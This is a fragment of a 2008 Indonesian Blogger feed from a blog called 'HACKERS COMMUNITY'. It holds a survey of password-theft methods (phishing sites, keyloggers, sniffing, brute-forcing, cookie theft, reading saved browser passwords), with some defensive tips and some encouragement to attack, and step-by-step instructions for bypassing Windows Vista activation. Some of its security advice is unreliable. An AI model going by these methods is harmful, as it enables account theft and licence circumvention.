dalam PHP dibaca sebagai karakter “&amp;lt;”&lt;br /&gt;sedangkan karakter “&amp;lt;” oleh PHP akan dibaca tags HTML atau JavaScript&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5773664350252692454-3729287148470349526?l=jepunscript-itzone.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jepunscript-itzone.blogspot.com/feeds/3729287148470349526/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5773664350252692454&amp;postID=3729287148470349526&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/3729287148470349526'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/3729287148470349526'/><link rel='alternate' type='text/html' href='http://jepunscript-itzone.blogspot.com/2008/01/bagaimana-bug-xss-terjadi.html' title='BAGAIMANA BUG XSS TERJADI'/><author><name>HACKERS COMMUNITY</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5773664350252692454.post-6647110178845378724</id><published>2008-01-26T03:40:00.000-08:00</published><updated>2008-06-29T03:52:31.783-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>cara hackers mendapatkan password</title><content type='html'>&lt;p&gt;Pencurian password, pengambilalihan account, merupakan hal yang sering terjadi di dunia cyber. Bukan hal yang sulit untuk melakukannya, namun banyak para newbie yang terus saja bertanya-tanya.. “Bagaimana cara mendapatkan password email orang lain?” atau pertanyaan yang paling sering saya terima ialah.. “Bagaimana cara anda mendapatkan password saya?” :P&lt;br /&gt;&lt;br /&gt;Untuk pertanyaan-pertanyaan itulah artikel ini ditulis, semoga bisa menambah wawasan anda dan membuka pikiran anda tentang betapa pentingnya menjaga account saat berada di tempat-tempat rawan.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bagaimana Mendapatkannya?&lt;br /&gt;&lt;br /&gt;Ada banyak cara untuk mendapatkan suatu password. Beberapa diantaranya tidak membutuhkan keahlian khusus. Berikut adalah cara-cara yang paling umum dan paling sering digunakan:&lt;br /&gt;&lt;br /&gt;[1]. Social Engineering&lt;br /&gt;[2]. KeyLogger&lt;br /&gt;[3]. Web Spoofing&lt;br /&gt;[4]. Menghadang Email&lt;br /&gt;[5]. Password Cracking&lt;br /&gt;[6]. Session Hijacking&lt;br /&gt;[7]. Menjadi Proxy Server&lt;br /&gt;[8]. Memanfaatkan Kelalaian User Dalam Penggunaan Fitur Browser&lt;br /&gt;[9]. Googling&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;strong&gt;[1]. Social Engineering&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;Social Engineering adalah nama suatu tehnik pengumpulan informasi dengan memanfaatkan celah psikologi korban. Atau mungkin boleh juga dikatakan sebagai “penipuan” :P Sosial Engineering membutuhkan kesabaran dan kehati-hatian agar sang korban tidak curiga. Kita dituntut untuk kreatif dan mampu berpikiran seperti sang korban.&lt;br /&gt;&lt;br /&gt;Social Engineering merupakan seni “memaksa” orang lain untuk melakukan sesuatu sesuai dengan harapan atau keinginan anda. Tentu saja “pemaksaan” yang dilakukan tidak secara terang-terangan atau diluar tingkah laku normal yang biasa dilakukan sang korban.&lt;br /&gt;&lt;br /&gt;Manusia cenderung untuk percaya atau mudah terpengaruh terhadap orang yang memiliki nama besar, pernah (atau sedang berusaha) memberikan pertolongan, dan memiliki kata-kata atau penampilan yang meyakinkan. Hal ini sering dimanfaatkan pelaku social engineering untuk menjerat korbannya. Seringkali sang pelaku membuat suatu kondisi agar kita memiliki semacam ketergantungan kepadanya.Ya,tanpa kita sadari dia mengkondisikan kita dalam suatu masalah dan membuat ( seolah - olah hanya ) dialah yang bisa mengatasi masalah itu. Dengan demikian,tentu kita akan cenderung untuk menuruti apa yang dia instruksikan tanpa merasa curiga.&lt;br /&gt;&lt;br /&gt;Sosial Engineering adakalanya menjadi ancaman serius. Memang sepertinya tidak ada kaitan dengan teknologi, namun sosial engineering tetap layak diwaspadai karena bisa berakibat fatal bagi sistem anda. Why?? Karena bagaimanapun juga suatu komputer tetap saja tidak bisa lepas dari manusia. Ya, tidak ada satu sistem komputerpun di muka bumi ini yang bisa lepas dari campur tangan manusia. sehebat apapun pertahanan anda, jika anda sudah dikuasai oleh attacker melalui social engineering, maka bisa jadi anda sendirilah yang membukakan jalan masuk bagi sang attacker.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;[2]. KeyLogger&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;KeyLogger adalah software yang dapat merekam aktivitas user. Hasil rekaman itu biasa disimpan berupa teks atau gambar. KeyLogger bekerja berdasarkan ketukan keyboard user. Aplikasi ini mampu mengenali form-form sensitif seperti form password misalnya.&lt;br /&gt;&lt;br /&gt;Ada cara aman untuk menghindari keyloger: &lt;/p&gt;&lt;ul&gt;&lt;li&gt;Gunakan password dengan karakter special seperti !@#$%^&amp;amp;*(){}[]. Kebanyakan keyloger akan mengabaikan karakter ini sehingga sang pelaku (pemasang keyloger) tidak akan mendapatkan password anda yang sebenarnya.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Persiapkan password dari rumah, simpan dalam bentuk teks. Saat ingin memasukkan password, tingal copy-paste ajah. Keyloger akan membaca password anda berdasarkan ketukan keyboard. Namun cara ini agak beresiko. Mengapa? karena saat anda melakukan copy, data anda akan tersimpan di clipboard. Saat ini banyak dijumpai software-software gratis yang bisa menampilkan data dalam clipboard. &lt;/li&gt;&lt;/ul&gt;&lt;p align="left"&gt;&lt;strong&gt;[3]. Web Spoofing&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Masih ingat kasus pecurian Account sejumlah nasabah Bank BCA? Ya, itulah salah satu contoh nyata dari Web spoofing. Inti dari tehnik ini ialah dengan memanfaatkan kesalahan user saat mengetikkan alamat situs pada address bar. Pada dasarnya, Web Spoofing adalah usaha untuk menipu korban agar mengira dia sedang mengakses suatu situs tertentu, padahal bukan.&lt;br /&gt;&lt;br /&gt;Pada kasus bank BCA, pelaku membuat situs yang sangat mirip dan identik dengan situs aslinya sehingga sang korban yang terkecoh tidak akan merasa ragu mengisikan informasi sensitif seperti user name dan Passwordnya. Padahal, karena situs tersebut adalah situs tipuan, maka semua informasi berharga tadi terekam oleh webserver palsu, yaitu milik sang pelaku.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;[4]. Menghadang Email&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Menghadang email? Ya, dan sangat mudah untuk melakukan hal ini. Salah satu cara adalah dengan menggunakan mailsnarf yang terdapat pada utility dsniff. Cara kerja Mailsnarf adalah dengan menghadang paket data yang lewat di Internet dan menyusunnya menjadi suatu email utuh.&lt;br /&gt;&lt;br /&gt;Dsniff dan mailsnift merupakan software bekerja atas dasar WinPcap (setara dengan libcap pada Linux) yaitu suatu library yang menangkap paket-paket data. Paket-paket yang ditangkap ini akan disimpan dalam bentuk file oleh Windump, sedangkan Dsniff dan MailSnarf bertindak lebih jauh lagi yaitu menganalisa paket-paket data ini dan menampilkan password (dsniff) atau isi email (mailsnarf). &lt;/p&gt;&lt;p align="left"&gt;&lt;br /&gt;&lt;strong&gt;[5]. Password Cracking&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;“Hacking while sleeping.” itulah ungkapan yang biasa dipakai oleh orang-orang yang melakukan password cracking. Mengapa? Karena pada umumnya dibuthkan waktu yang lama untuk melakukan pasword cracking. Bisa berjam-jam, bahkan berhari - hari! Semua itu tergantung dari target, apakah sang target menggunakan password yang umum, password memiliki panjang karakter yang tidak biasa, atau password memiliki kombinasi dengan karakter-karakter special.&lt;br /&gt;&lt;br /&gt;Salah satu software yang biasa digunakan untuk melakukan hal ini ialah dengan mengunakan Brutus, salah satu jenis software remote password cracker yang cukup terkenal. Brutus bekerja dengan teknik dictionary attack atau bruce-force attack terhadap port-port http, POP3,ftp, telnet, dan NetBIOS.&lt;br /&gt;&lt;br /&gt;Dictionary Attack bekerja dengan mencobakan kata-kata yang ada dalam kamus password. Sedangkan brute - force attack bekerja dengan mencobakan semua kombinasi huruf, angka, atau karakter.&lt;br /&gt;&lt;br /&gt;Brute Force Atack bekerja sangat lambat dan membutuhkan waktu yang lama tergantung dari jenis spesifikasi komputernya dan panjang karakter passwordnya. Saat ini telah banyak situs yang menutup akses terhadap akses terhadap usaha login yang secara terus-menerus tidak berhasil.&lt;br /&gt;&lt;br /&gt;Jika anda ingin melakukan password Cracking, silahkan pilih - pilih sendiri aplikasinya di halaman Member - spyrozone.tk.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;[6]. Session Hjacking&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Session hijacking dewasa ini semakin marak dikalangan para attacker. Session Hijacking biasa dilakukan dengan melakukan peniruan cookies. Jadi pada intinya, kita harus bisa meniru cookies sang korban untuk mendapatkan sesi loginnya.&lt;br /&gt;&lt;br /&gt;Lalu bagaimana cara mendapatkan cookies sang korban?&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Dengan analisa Cookies. Cara ini relatif sulit dilakukan. &lt;/li&gt;&lt;li&gt;Mencuri Cokies.&lt;br /&gt;Misalnya Sang Attacker ingin mendapatkan account si A. Sang Attacker bisa dengan mudah membuat semacam script Java Script yang disisipkan dalam email untuk dikirim ke korban.Saat korban membuka email itu, tanpa sadar cookiesnya akan dicuri dan direkam ke suatu webserver dengan memanfaatkan suatu script PHP. &lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;br /&gt;Belakangan ini yang paling sering menjadi incaran adalah account Friendster. Ada yang menyisipkan suatu scipt lewat testimonial, ada yang menyisipkannya di profilnya sendiri untuk mencuri cookies sang korban dan lain sebagainya. Saya memiliki tips untuk ini: &lt;/p&gt;&lt;ul&gt;&lt;li&gt;Jangan menggunakan browser Internet Explorer&lt;br /&gt;Saat ingin membuka profil orang lain, jangan menggunakan Internet Explorer. Catat alamat profil yang ingi anda lihat,logout terlebih dahulu dari account anda dan bersihkan semua cookies, baru kemudian bukalah profil Friendster tujuan. &lt;/li&gt;&lt;li&gt;Periksa Source CODEnya&lt;br /&gt;Ketika menerima testimonial, periksa terlebih dahulu source codenya. Apakah disana terdapat script asing atau kata-kata yang identik dengan pembajakan seperti :&lt;br /&gt;“HACKED”, “DEFACED”, “OWNED”.. dll..&lt;br /&gt;Jika ragu-ragu……. reject ajah.. &lt;/li&gt;&lt;li&gt;LogOUT tiba-tiba.&lt;br /&gt;Waspada ketika tanpa suatu alasan yang jelas tiba-tiba anda logout dengan sendirinya dari account anda. Saat anda diminta memasukkan username dan password, lihat dulu addressbar anda! apakan anda sedang berada di situs yang semestinya atau tidak. Periksa source code halaman tersebut.Lihat pada form action, kemana informasi anda nantinya akan dikirim.&lt;br /&gt;&lt;br /&gt;Sebenarnya session hijacking bisa dicegah jika saja sang penyedia layanan memperhatikan hal-hal berikut:&lt;br /&gt;&lt;br /&gt;1. Menetapkan session identifier yang unik&lt;br /&gt;2. Menetapkan sistem identifier berpola acak&lt;br /&gt;3. Session identifier yang independen&lt;br /&gt;4. Session identifier yang bisa dipetakan dengan koneksi client side.&lt;br /&gt;&lt;br /&gt;Fenomena lain adalah, hingga saat artikel ini diterbitkan, ternyata masih banyak dijumpai para user yang tidak melakukan sign out setelah membuka accountnya. Dengan demikian, orang lain yang mengunakan komputer itu dan membuka website yang sama dengan yang telah dibuka oleh orang pertama akan otomatis login ke account sang korban.&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;strong&gt;[7]. Menjadi Proxy Server&lt;/strong&gt; &lt;/p&gt;&lt;p&gt;&lt;br /&gt;Kita bisa mengumpulkan informasi dengan menjadi proxy server bagi korban untuk dapat berselancar. Dengan menjadi proxy server, seluruh identitas sang peselancar bisa menjadi milik kita.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;[8]. Memanfaatkan Kelalaian user dalam penggunaan fitur browser&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Setiap browser tentunya memiliki fitur yang ditujukan untuk kemudahan dan kenyamanan penggunanya dalam berselancar. Diantaranya ialah dengan adanya cache dan Password Manager.&lt;br /&gt;&lt;br /&gt;Di Internet tentunya banyak suatu website yang isinya tidak berubah dalam beberapa hari (Contohnya spyrozone.tk nich.. hehehe ;) Nah, untuk situs yang seperti ini cache menjadi hal yang sangat berguna. Cache akan menyimpan file-file hasil browsing sehinga nantinya jika anda berkunjung lagi ke situs tersebut browser tidak perlu lagi melakukan download untuk kedua kalinya dari server sehingga setiap halaman situs yang telah anda buka sebelumnya akan terbuka dengan lebih cepat. Semua itu biasanya diatur oleh header time to live.&lt;br /&gt;&lt;br /&gt;Lho, bagaimana dengan situs-situs penyedia berita yang selalu up to date? Untuk site yang seperti itu, time to live-nya akan di set=0 sehinga nantinya anda akan terus melakukan download setiap kali berkunjung.&lt;br /&gt;&lt;br /&gt;Cukup nyaman bukan? Ya, tapi ancaman mulai timbul. Cobalah kini anda jelajahi opsi-opsi yang berkaitan dengan cache pada browser anda. Tentu anda bisa menemui bahwa ada fasilitas untuk menentukan berapa besarnya file temporary yang bisa disimpan di harddisk. Cari juga lokasi dimana file-file tersebut akan disimpan.&lt;br /&gt;&lt;br /&gt;Coba anda buka folder tersebut, anda akan menemui file-file html &amp;amp; file-file gambar dari site-site yang sudah anda kunjungi. Pada Browser IE, anda bisa melihat lokasi file cache dengan menjelajahi menu Tools —&gt; Internet options —&gt; Settings&lt;br /&gt;&lt;br /&gt;Lalu apa yang bisa didapatkan?? toh cuma file-file “sampah”?? Hmm… sekarang coba anda copy semua file yang ada di sana ke suatu folder. Lalu bukalah salah-satu file htmlnya. Jika itu komputer publik,anda bisa mengetahui situs apa saja yang telah diakses oleh oleh orang sebelum anda.&lt;br /&gt;&lt;br /&gt;Hmm.. hanya dengan melihat file temporary anda bahkan bisa melihat password dan dll. Banyak saya temui situs yang menyimpan password dan menampilkannya pada url. Tentunya anda juga pasti sering membacanya di berbagai tutorial.&lt;br /&gt;&lt;br /&gt;Kebanyakan browser pada saat ini memiliki fasilitas untuk menyimpan password. Misalnya saat meggunakan Mozilla Firefox, anda pasti sering menerima kotak dialog konfirmasi yang menanyakan apakah anda ingin password anda disimpan atau tidak oleh PasswordManager.Kebanyakan user cenderung untuk memilih opsi YES, entah itu dengan penuh kesadaran atau memang mereka tidak tau ( baca: tidak mau tau) apa maksud dari kotak dialog itu.&lt;br /&gt;&lt;br /&gt;Orang lain yang kemudian mengunakan browser itu bisa dengan sangat mudah mendapatkan password korban dengan memasuki menu Tools —&gt; Options —&gt; Security –&gt; Saved password.&lt;br /&gt;&lt;br /&gt;Contoh lain adalah fasilitas wand password yang dimiliki oleh browser Opera. Saat anda memasukkan user name dan password pada suatu form dan menekan tombol submit, opera secara default akan meminta konfirmasi kepada anda apakah anda ingin browser menyimpan id dan password anda atau tidak. Lagi dan lagi… kebanyakan netter ceroboh, mereka cenderung untuk memilih opsi “YES”.&lt;br /&gt;&lt;br /&gt;Lalu?? Orang lain yang kemudian menggunakan browser itu bisa melihat situs apa saja yang telah diakses oleh user, arahkan browser ke situs tersebut, letakkan cursor pada form isian user name, tekan [ALT]+[ENTER] dan BOOOMM!!!! Kenapa?? Jangan kaget dulu!! Hehehe.. form login akan otomatis terisi dengan user name korban lengkap dengan passwordnya ;D (It’s fun enough.. ;)&lt;br /&gt;&lt;br /&gt;Ini hanya sebagian kecil contoh, jelajahi fitur-firtur browser lain!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;[9]. Googling&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Google.com. Banyak sudah situs yang runtuh, password dan nomor - nomor kartu kredit yang dicuri akibat dari ulah orang yang menyalahgunaan kesaktiannya ;) Dahulu, hal ini mudah dilakukan.Hanya dengan mengetikkan kata kunci tertentu yang berkaitan dengan user name dan password, anda bisa memanen ratusan password user melalui google. Tapi sekarang tampaknya anda harus gigit jari jika menggunakan cara diatas ;D&lt;br /&gt;&lt;br /&gt;Jangan sedih dulu karena Google baru saja menelurkan produk barunya, yaitu Google Code Search. Ancaman baru mulai timbul, “si pintar” ini kini dapat meng-crawl hingga kepada archive file yang berada di public directory web server. Hati-hati yang punya kebiasaan untuk menyimpan informasi penting di dalamnya (password, dan info berharga lainnya) Sebaiknya mulai sekarang kebiasaan itu dihilangkan. Selalu proteksi folder-folder yang sensitif agar situs anda bisa hidup lebih lama. Kalo nggak… yach.. tunggu ajah ada orang yang memanfaatkan produk baru google ini untuk mengeruk informasi sensitif dari web server anda. dan jika itu sudah terjadi… maka bersiaplah.. “taman bermain” anda akan diambil alih olehnya..&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Penutup&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Wew… ada banyak cara bukan untuk mendapatkan account orang lain?? So, selalu berhati-hatilah. Waspada selalu saat berada di tempat umum, bahkan saat berada di komputer pribadi anda sekalipun karena bisa jadi teman anda atau siapapun yang meminjam komputer anda memiliki tujuan yang kurang baik.&lt;br /&gt;&lt;br /&gt;Sekian, semoga bermanfaat dan bisa menambah pengetahuan anda :)&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Referensi&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;- securityfocus.com&lt;br /&gt;- phrack.org&lt;br /&gt;- spyrozone.tk&lt;br /&gt;- google.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5773664350252692454-6647110178845378724?l=jepunscript-itzone.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jepunscript-itzone.blogspot.com/feeds/6647110178845378724/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5773664350252692454&amp;postID=6647110178845378724&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/6647110178845378724'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/6647110178845378724'/><link rel='alternate' type='text/html' href='http://jepunscript-itzone.blogspot.com/2008/01/cara-hackers-mendapatkan-password.html' title='cara hackers mendapatkan password'/><author><name>HACKERS COMMUNITY</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5773664350252692454.post-4074493941408114503</id><published>2008-01-24T02:59:00.000-08:00</published><updated>2008-06-27T21:43:15.467-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Cracking'/><title type='text'>mengcrack windows vista</title><content type='html'>Saya akan memberitahukan cara Mengrack Windows Vista Final Release.&lt;br /&gt;Tahapannya sebagai berikut:&lt;br /&gt;&lt;br /&gt;&lt;ol&gt;&lt;li&gt;klik bendera windowsKlik Rundan ketik Cmd. &lt;/li&gt;&lt;li&gt;setelah Muncul command prompt ketikan slmgr.vbs -dlv lalu tekan enter.fungsi dari perintah slmgr.vbs -dlv adalah untuk memeriksa Apakah Komponen Dari Windows untuk mengaktifkan Vistanya Berjalan. &lt;/li&gt;&lt;li&gt;klik bendera windowsklik Rundan ketik Services.msc,Cari software Licensing,dan pilih Disable di startup type.setelah itu Cari Ui Notification dan pilih Disable di startup type.setelah selesai klik close. &lt;/li&gt;&lt;li&gt;klik bendera windowsKlik Rundan ketik Cmdketikan slmgr.vbs -dlv lalu tekan enter. Setelah software licensing di disable dan juga UI notification, maka Komponen Windows Untuk Menjalankan Slsvc.exe Akan tidak jalan.&lt;br /&gt;&lt;br /&gt;Catatanp:&lt;br /&gt;Setelah Melakukan tahapan di atas yang perlu anda perhatikan adalah:&lt;br /&gt;&lt;br /&gt;1. Anda tidak bisa Menjalankan Control Panel&lt;br /&gt;2. Anda tidak bisa Menjalankan Properties kalau di klik kanan di desktop.&lt;br /&gt;3. Anda tidak bisa Menjalankan Properties kalau di klik kanan di My Computer.&lt;br /&gt;&lt;br /&gt;Tetapi jangan khawatir karena anda masih bisa menginstall Program baru. dan semua aplikasi windows seperti Windows Media player,dan lain-lain. masih bisa di jalankan.&lt;br /&gt;&lt;br /&gt;Ok...Semoga bermanfaat dan selamat mengcrack Microshit Vista...ha..ha..ha...ha.....&lt;br /&gt;&lt;br /&gt;dikutip dari :&lt;br /&gt;Onno, 2007&lt;br /&gt;Web Design &amp;amp; Programmer&lt;br /&gt;farmindo SG, Wisesa-Consulting&lt;/li&gt;&lt;/ol&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5773664350252692454-4074493941408114503?l=jepunscript-itzone.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jepunscript-itzone.blogspot.com/feeds/4074493941408114503/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5773664350252692454&amp;postID=4074493941408114503&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/4074493941408114503'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/4074493941408114503'/><link rel='alternate' type='text/html' href='http://jepunscript-itzone.blogspot.com/2008/01/mengcrack-windows-vista.html' title='mengcrack windows vista'/><author><name>HACKERS COMMUNITY</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
